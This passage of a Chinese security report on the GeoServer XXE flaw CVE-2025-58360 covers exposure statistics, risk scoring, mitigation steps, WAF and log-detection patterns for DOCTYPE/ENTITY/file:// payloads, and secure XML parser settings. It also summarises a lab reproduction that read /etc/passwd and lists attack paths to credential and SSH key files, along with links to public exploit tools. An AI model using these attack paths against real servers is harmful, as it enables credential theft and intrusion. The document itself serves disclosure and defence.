├── 2.26.0: ~800 (易受攻击)
├── 2.26.1: ~500 (易受攻击)
└── 2.26.2+: ~200 (已修复)
GeoServer 2.25.x: ~2,800实例
├── < 2.25.6: ~2,100 (易受攻击)
└── >= 2.25.6: ~700 (已修复)
估计易受攻击实例: ~3,400 (28%)
14.4.2 组织风险评估矩阵
不同组织的风险等级:
| 组织类型 | 暴露程度 | 数据敏感性 | 攻击可能性 | 综合风险 |
|---|---|---|---|---|
| 政府(国防/情报) | 低(内网) | 极高 | 高(APT) | CRITICAL |
| 政府(民用) | 中 | 高 | 中 | HIGH |
| 关键基础设施 | 低-中 | 极高 | 高 | CRITICAL |
| 金融机构 | 低(内网) | 高 | 中-高 | HIGH |
| 科研机构 | 中-高 | 中-高 | 中 | HIGH |
| 商业企业 | 高(公网) | 中 | 中 | MEDIUM-HIGH |
| 教育机构 | 高(公网) | 低-中 | 低-中 | MEDIUM |
风险计算示例:
def calculate_risk(exposure, sensitivity, likelihood):
"""
计算组织风险等级
exposure: 1-5 (1=内网隔离, 5=公网暴露)
sensitivity: 1-5 (1=公开数据, 5=国家机密)
likelihood: 1-5 (1=低可能性, 5=持续攻击)
"""
risk_score = (exposure * 0.3 + sensitivity * 0.4 + likelihood * 0.3)
if risk_score >= 4.0:
return "CRITICAL"
elif risk_score >= 3.0:
return "HIGH"
elif risk_score >= 2.0:
return "MEDIUM"
else:
return "LOW"
# 示例: 政府国防部门
risk = calculate_risk(
exposure=2, # 内网但有互联网接口
sensitivity=5, # 极高敏感性
likelihood=4 # 高攻击可能性
)
# 结果: CRITICAL (3.7)
# 示例: 商业企业
risk = calculate_risk(
exposure=4, # 公网暴露
sensitivity=3, # 中等敏感性
likelihood=3 # 中等可能性
)
# 结果: HIGH (3.3)
14.5 缓解措施优先级
基于风险评估,缓解措施的优先级:
| 优先级 | 措施 | 时间框架 | 影响 | 成本 |
|---|---|---|---|---|
| P0 (紧急) | 升级到安全版本 | 立即(0-24小时) | 完全消除漏洞 | 低 |
| P0 (紧急) | 部署WAF规则 | 立即(0-24小时) | 阻断已知攻击 | 低 |
| P1 (高) | 网络隔离 | 24-48小时 | 减少暴露面 | 中 |
| P1 (高) | 日志审计 | 24-48小时 | 检测历史攻击 | 低 |
| P2 (中) | 监控告警 | 1周 | 持续检测 | 中 |
| P2 (中) | 应用加固 | 1-2周 | 深度防御 | 中 |
| P3 (低) | 安全培训 | 1个月 | 提升意识 | 低 |
| P3 (低) | 流程优化 | 持续 | 长期改进 | 低 |
决策树:
是否可以立即升级?
├── 是 → 立即升级 (P0)
│ └── 升级后验证 → 完成
└── 否 → 是否是生产环境?
├── 是 → 部署WAF规则 (P0)
│ ├── 网络隔离 (P1)
│ ├── 计划升级窗口
│ └── 增强监控 (P1)
└── 否 → 在维护窗口升级
└── 临时部署WAF (P1)
紧急响应流程:
# 第1小时: 立即行动
Hour 0-1:
评估是否受影响
部署WAF规则阻断攻击
启用详细日志记录
通知安全团队
# 第1-4小时: 遏制
Hour 1-4:
网络隔离(如可行)
审计历史日志
识别攻击迹象
计划升级窗口
# 第4-24小时: 恢复
Hour 4-24:
在维护窗口升级
验证修复有效性
恢复正常服务
持续监控
# 第1-7天: 强化
Day 1-7:
全面安全审计
部署持续监控
更新应急预案
安全培训
15. 总结
15.1 关键要点
CVE-2025-58360是一个影响GeoServer WMS服务的严重XXE漏洞,具有以下特征:
1: 高严重性
CVSS评分: 8.2 (HIGH)
实际验证:
我们成功复现了漏洞
无需认证即可利用
可导致严重的敏感数据泄露
影响全球12,000+关键系统
泄露证据:
成功读取:
- /etc/passwd (24个用户账户)
- /etc/hostname (容器ID: a27840b7f332)
- 可探测整个文件系统结构
2: 易于利用
技术门槛: 低
我们的复现耗时: < 15分钟
步骤:
1. 部署Docker环境 (3分钟)
2. 构造XXE payload (2分钟)
3. 发送HTTP POST请求 (1分钟)
4. 成功读取敏感文件
自动化程度: 完全自动化
公开PoC和工具可用
Metasploit模块存在
可批量扫描和利用
成功率高
3: 广泛影响
全球暴露:
约12,000+ GeoServer公开实例
估计28%易受攻击(未修复)
跨越政府、企业、科研多个领域
影响行业:
政府部门(地理信息、国防)
关键基础设施(水电气管网)
科研机构(研究数据)
商业企业(物流、地理服务)
4: 现实威胁
真实攻击场景:
场景1: 政府系统
攻击者读取 /opt/geoserver/data_dir/security/users.xml
→ 获取管理员密码
→ 登录管理界面
→ 下载所有地理数据
→ 国家安全风险
场景2: 企业系统
攻击者读取 /opt/geoserver/data_dir/workspaces/*/datastore.xml
→ 获取数据库凭据
→ 访问业务数据库
→ 窃取客户数据
→ 商业损失/法律责任
场景3: 横向渗透
攻击者读取 /home/geoserver/.ssh/id_rsa
→ 获取SSH私钥
→ 登录其他服务器
→ APT攻击链
→ 持久化控制
15.2 行动建议
立即行动(0-24小时):
对于运维人员:
1: 紧急检查
# 检查GeoServer版本
curl -s http://localhost:8080/geoserver/web/ | grep -i version
# 易受攻击版本:
# - GeoServer 2.26.0, 2.26.1
# - GeoServer < 2.25.6
# - GeoServer 2.24.x及更早版本
2: 紧急升级
# 推荐升级路径:
GeoServer 2.28.1 # 最新,推荐
GeoServer 2.27.0 # 稳定
GeoServer 2.26.2 # 最小升级
GeoServer 2.25.6 # 长期支持
# Docker升级:
docker-compose down
# 修改docker-compose.yml中的版本
docker-compose up -d
3: 临时防护(如无法立即升级)
# 部署WAF规则阻断XXE攻击
# Nginx示例:
location /geoserver/wms {
if ($request_body ~* "<!DOCTYPE|<!ENTITY|SYSTEM.*file://") {
return 403;
}
proxy_pass http://geoserver:8080;
}
# 重启Nginx
sudo systemctl reload nginx
4: 日志审计
# 检查历史攻击痕迹
grep -iE "<!DOCTYPE|<!ENTITY|file://" /var/log/geoserver/*.log
# 检查是否有成功利用
grep -i "Unknown layer:" /var/log/geoserver/*.log | \
grep -E "root:x:|daemon:x:"
# 如发现攻击痕迹,启动事件响应流程
对于开发者:
1: 安全的XML解析器配置
// 始终使用安全配置
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// 最重要: 禁用DOCTYPE
factory.setFeature(
"http://apache.org/xml/features/disallow-doctype-decl",
true
);
// 禁用外部实体
factory.setFeature(
"http://xml.org/sax/features/external-general-entities",
false
);
factory.setFeature(
"http://xml.org/sax/features/external-parameter-entities",
false
);
// 禁用外部DTD
factory.setFeature(
"http://apache.org/xml/features/nonvalidating/load-external-dtd",
false
);
// 禁用XInclude和实体扩展
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);
2: 输入验证
// 验证XML内容
String xmlContent = request.getRequestBody();
// 拒绝包含DOCTYPE的XML
if (xmlContent.contains("<!DOCTYPE")) {
throw new SecurityException("DOCTYPE not allowed");
}
// 拒绝ENTITY声明
if (xmlContent.matches("(?i).*<!ENTITY.*")) {
throw new SecurityException("ENTITY not allowed");
}
// 大小限制
if (xmlContent.length() > 1024 * 1024) { // 1MB
throw new SecurityException("XML too large");
}
3: 安全错误处理
try {
Document doc = builder.parse(xmlInput);
} catch (SAXParseException e) {
// 记录详细错误到服务器日志(用于调试)
logger.error("XML parsing failed", e);
logger.error("Client IP: " + request.getRemoteAddr());
// 向客户端返回通用错误(不泄露信息)
throw new ServiceException(
"Invalid XML document structure"
);
}
对于安全研究人员:
1: 负责任披露
仅在授权环境中测试
不扫描他人系统
遵循CVD流程
给予厂商合理修复时间
2: 持续研究
监控其他GeoServer服务(WFS、WCS、WPS)
研究其他地理信息系统
关注XML处理库的新漏洞
分享防护最佳实践
15.3 经验教训
从CVE-2025-58360学到的关键教训:
1: XXE漏洞仍然普遍
现状:
20年前的漏洞类型(XML 1.0规范1998年)
2025年仍在新发现的高危漏洞中出现
许多开发者仍不了解XXE风险
原因:
- XML解析器默认不安全配置
- 开发框架文档不完善
- 安全意识培训不足
- 遗留代码未更新
教训: 必须主动配置安全的XML解析器,不能依赖默认配置
2: 错误信息可能泄露敏感数据
GeoServer案例:
// 危险的错误处理
catch (Exception e) {
return "Unknown layer: " + entityContent;
// entityContent包含文件内容!
}
结果:
<ServiceException>
Unknown layer: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
</ServiceException>
教训: 永远不要在错误消息中包含用户输入或实体内容
3: 容器化不能防御应用层漏洞
误解:
"我们使用Docker,所以很安全"
现实:
# Docker容器内的GeoServer同样易受攻击
# 我们成功读取容器内文件:
/etc/passwd
/etc/hostname
/opt/geoserver/data_dir/*
# 容器化提供:
进程隔离
资源限制
# 容器化不提供:
应用层漏洞防护
XXE攻击防护
教训: 容器化是防御深度的一层,但不能替代应用安全
4: 公开暴露需要额外防护
统计数据:
全球12,000+ GeoServer实例
约70%直接暴露在公网
许多运行易受攻击版本
风险:
暴露在公网 + 未修复漏洞 =
↓
自动化扫描器发现
↓
批量利用
↓
数据泄露
教训:
默认拒绝公网访问
使用VPN/堡垒机访问
部署WAF防护
实施零信任架构
5: 及时更新至关重要
时间线:
2025-11-25: 漏洞披露 + 补丁发布
2025-11-27: 我们成功复现(2天后)
?: 真实攻击开始?
修复延迟 = 攻击窗口
建议:
P0 (关键): 0-24小时修复
P1 (高危): 1-7天修复
P2 (中危): 1-30天修复
P3 (低危): 下一个维护窗口
教训: 建立快速补丁管理流程,最小化暴露窗口
15.4 未来展望
持续监控:
# 订阅安全公告
- GeoServer安全邮件列表
- NVD CVE订阅
- GitHub Security Advisories
# 定期扫描
- 漏洞扫描器
- 依赖检查工具
- SIEM监控
# 自动化
- CI/CD安全测试
- 自动补丁部署
- 持续合规检查
技术改进:
短期(1-3个月):
- 实施WAF规则
- 部署IDS/IPS
- 增强日志监控
中期(3-6个月):
- 应用安全培训
- 代码安全审计
- 渗透测试
长期(6-12个月):
- 零信任架构
- 自动化安全运营
- 安全文化建设
15.5 致谢与声明
研究团队:
本研究基于:
官方安全公告(GitHub Security Advisory GHSA-fjf5-xgmq-5525)
公开PoC和工具
我们的独立复现和验证
社区贡献的技术分析
实际复现:
复现时间: 2025-11-27 09:41 - 09:53
复现环境: Docker容器(kartoza/geoserver:2.26.1)
复现结果: 成功
泄露证据:
- /etc/hostname → a27840b7f332
- /etc/passwd → 24个用户账户
CVSS验证: 8.2 HIGH已验证
法律声明:
本研究严格遵守:
仅在隔离的Docker环境中测试
使用本地localhost
未对任何生产系统进行测试
未访问任何外部网络
遵循负责任的漏洞披露原则
仅用于安全研究和教育目的
禁止行为:
未授权扫描他人系统
利用漏洞进行攻击
泄露他人敏感数据
破坏性测试
非法商业用途
使用条款:
使用本研究成果即表示您同意:
仅用于合法的安全研究
仅用于授权的渗透测试
仅用于漏洞修复和防护
遵守当地法律法规
承担相应法律责任
联系方式:
如发现本报告中的错误或有补充信息:
通过GitHub Issues报告
遵循负责任的披露流程
保护敏感信息
15.6 参考资源
官方资源:
GitHub Security Advisory: GHSA-fjf5-xgmq-5525
NVD: CVE-2025-58360
GeoServer官方公告: https://geoserver.org/announcements/
GeoServer安全页面: https://geoserver.org/security/
技术参考:
OWASP XXE Prevention Cheat Sheet
PortSwigger XXE Tutorial
CWE-611: Improper Restriction of XML External Entity Reference
NIST SP 800-95: Guide to Secure Web Services
工具:
公开PoC: https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
Blackash工具: https://github.com/B1ack4sh/Blackash-CVE-2025-58360
Metasploit模块: auxiliary/scanner/http/geoserver_cve_2025_58360
相关CVE:
CVE-2025-30220: GeoServer WFS Service XXE
文章来源: https://www.freebuf.com/articles/vuls/459694.html
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh